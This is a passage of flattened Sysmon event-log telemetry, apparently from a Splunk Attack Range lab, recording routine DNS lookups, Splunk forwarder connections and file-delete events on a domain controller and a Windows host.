16:29:32.565{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local51801- 354300x80000000000000001061229Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.564{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local52868- 354300x80000000000000001061228Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.562{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local58886- 354300x80000000000000001061227Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.561{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local51240- 354300x80000000000000001061226Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.558{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local59241- 354300x80000000000000001061225Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.557{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54400- 354300x80000000000000001061224Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.556{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local52624- 354300x80000000000000001061223Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.556{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local58124- 354300x80000000000000001061222Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.555{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local50980- 354300x80000000000000001061221Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.554{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local59273- 354300x80000000000000001061220Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.554{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local51291- 354300x80000000000000001061219Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.553{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local56850- 354300x80000000000000001061218Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.552{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local57761- 354300x80000000000000001061217Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.552{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local58412- 354300x80000000000000001061216Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.551{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local54922- 354300x80000000000000001061215Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.550{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local56110- 354300x80000000000000001061214Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.549{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local56650- 23542300x8000000000000000245902Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:35.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6209AFA909AF4C32530661A841CC32F,SHA256=31FAA295DD8DB23EA744EBB79E43A097D95F7DBE9DEFCC15E584A94A0ADF2E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061236Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:36.920{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D29E1E23B8A863C06AD9CEAE2A136CE,SHA256=AFD76F4C658E2E4CE5D802587F29BB0E04B1E145E0152F5AED00A7469D4B5A2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061235Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.570{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local57470- 354300x80000000000000001061234Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.568{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54173- 354300x80000000000000001061233Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:32.567{7F8C56E7-4E4C-6063-3500-00000000AF01}1992C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-877.attackrange.local53domainfalse10.0.1.14win-dc-877.attackrange.local49627- 354300x8000000000000000245906Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:35.577{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64782-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245905Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:36.193{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF72E3467F49AA68B8653DFB70572748,SHA256=BC51FC996E887D02B5105C950A466224AA137D841774C182AEE61266D31B23B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245904Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:36.193{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BAA6F32E1F93FB5F5CF0F874CB89347,SHA256=A0D1E743F7FD64C074947EA7EDC098427078F69EE84ED5D18608F1D771E9E91D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245903Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:36.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8D0BE474D3E8E74655FF08B761E2EE1,SHA256=FBFF19E70637DDB5DA0EB60008A21567803DA9C6B6AC2B78EC0AE5A0A61DD408,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245907Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:37.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38615E7FC15657764B704FAFA7B1E60A,SHA256=2058D79694E94F6033F767ED1AE2E6CB136170F878708511AD6DC4664AC3A8E5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061239Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:36.075{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54812-false10.0.1.12-8000- 23542300x80000000000000001061238Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:38.515{7F8C56E7-4F98-6063-D400-00000000AF01}3720ATTACKRANGE\AdministratorC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\Administrator\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\3720.xml~RFe8ebe.TMPMD5=2A60D97C76F5CF2752AED82FAD0227B8,SHA256=69E369B0D3268BE891A2A7995B65D940CB8412510DCA4E2AFE7DA6E57A8CF59A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061237Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:38.359{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6869E567C72AC6D7CAECBE998340F0E6,SHA256=B9339BDBF671FD8ED01D37863BD226B205CEEAA11460C2838B783451B700D1D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245908Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:38.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9544031081B33CD05A98F213E9A0146,SHA256=B775376EB2B0A828BE1DBC61D93BD112CC81BDB7079D1392046C02654A919085,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061240Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:39.719{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0B11424656E4A16F4F84DFC78A886A,SHA256=E12C140DFF8A572DBF091F15D01F8690B8FA1FE4D6E2A893F01CD56E5DE9CC9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245909Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:39.005{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C477FBEF468D277412CFBFE73EAE9B80,SHA256=EE90EC153485C57BE8FD3C44E9D1EC6269B837F054A68272097E2836D735FA28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245910Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:40.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D1E618CC8DA081126B47B946FD0D14,SHA256=A46E406E229C3E7B5A04F03796821E60D344BDB96419D3240C63B75EDF739860,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061241Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:41.078{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66712523FD3AD9D07D9247C0F2EF8379,SHA256=93C1555AEB2FA819A1C7255ED35FDE2482A234D333F9E321B24C486EC33F7998,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245913Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:40.593{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64783-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245912Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:41.177{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF72E3467F49AA68B8653DFB70572748,SHA256=BC51FC996E887D02B5105C950A466224AA137D841774C182AEE61266D31B23B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245911Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:41.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14752EE93A630406F066699418827FFF,SHA256=0E1B973C5EA01CC0F0AE1E70C7D434F4FFC39A8B86607D732568D7A90D529C54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061243Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:42.453{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AFCF3EB2FFB81F6C40C178D4503C9333,SHA256=FBD05BCAA32F86C955169CFE6390ED69CBB067CA137E34F85CAE32E6D1A00CEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061242Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:42.453{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E44B3FE0656714B3EE5C24E506FFC27,SHA256=94A7AF7452B26A3B0C0700C7B5021D6DF2A0995E6CFF2FDD7966A3FF67C56B99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245914Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:42.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24BE822DBF8871BA29A2C7F5BB251E29,SHA256=8431C27B1D3FF2F79477BFD8AD2B6BD369E90991309D904E6E825F07503C8E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061244Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:43.813{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0012724E57AC4B21F3BF50A8804077E8,SHA256=B3869BD1F32D19594C03E01A89B5E19887F96953C64A77CC2A43D227F6A5BF2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245915Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:43.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AAB84FF851356600973579938D966B0,SHA256=70AA87147CB33D4EE73310806F3F8A97E658221D2841C136760D2BCB3F4ECAF7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061245Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:41.998{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54813-false10.0.1.12-8000- 23542300x8000000000000000245916Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:44.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E5A701B4D199B7C1DE5D9A882ED481,SHA256=6F97B0ECB9C8EE50C8E52008443D12B53EFD186BFC2266FD0E5F6D66DCC3E364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245917Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:45.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B46E021DD75691707B6BEBF69045C5E1,SHA256=8CBDCB98EA2DCE33AC817F69E9038D6334CAE386859A92465FCC24EC46FC5B24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061246Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:46.485{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C73D3D7A57BB4CDF02479933A4180B,SHA256=06FF8D577BE5375615A0B88CF63655EFFA6BFF46B9E211050EEF060E51D27F48,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000245921Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:45.656{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64784-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000245920Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:46.349{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4F689E719ECC893CF6913680C5928D6C,SHA256=CB9017943A0367DBB460281B0EBFDDA44D517090A36B54FD08748E589EF0C132,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245919Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:46.349{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A57E82BC263E8B2498A0D3846B391640,SHA256=BC274A276D2246D117CFC9B69A5225DA07E173F62F214CF7687E9CAED4F9BF5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245918Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:46.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3B1E29DB002B19733DE831D155C42E7,SHA256=1924E79E5C3BCCC11676C3344A6CF96059C742F76A7C64EFAE86A84A811EF755,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245922Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:47.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9143A62B62507B984285FFD815FA3F83,SHA256=377032DFB29FE3B4FD9FA8BB4D3887F111BF63084632FD8F9B293584DD5250D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061247Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:48.110{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B64FA61E543246C301607EB123958BC,SHA256=D11D96B2B9DBDA63AE32167E8DB21AF8065365C160CE08CD8CDDEE0126ED6891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245923Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:48.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91DFA604D84FE629C58D40A1E1B71900,SHA256=01AB3B9120DAEC1F7669194C5D71885DEF232F541FB65139F7CECE187FEB25B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061248Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:49.469{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8372AB7E50840206CAF04AC231B0248,SHA256=0DA62A1425E0C29A096546790369500926B2763A19554BA3CCFAD379E4E1F6CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245924Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:49.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0891FA1D51D24C302FA3E200DB227608,SHA256=428EC4A741F6F36B57C7AEF5E501D0D4C5755DE34D33CEE604D7C9C15AB24A6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061251Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:50.829{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1B56BAE1BA31B98D30A78D76BB4BEBF,SHA256=9871D0B02B673BFC0D41DAB2D731CE9D35681D8D448A968D6D7F28A1A7C7F3CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061250Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:47.857{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54814-false10.0.1.12-8000- 23542300x80000000000000001061249Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:50.235{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F456F58EEED174267E5C9C6ADF500697,SHA256=9A32E2C494D2ABC880314752ADAAE7150B98E32E5587284DBD2CC88B908AF0DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245925Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:50.021{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program 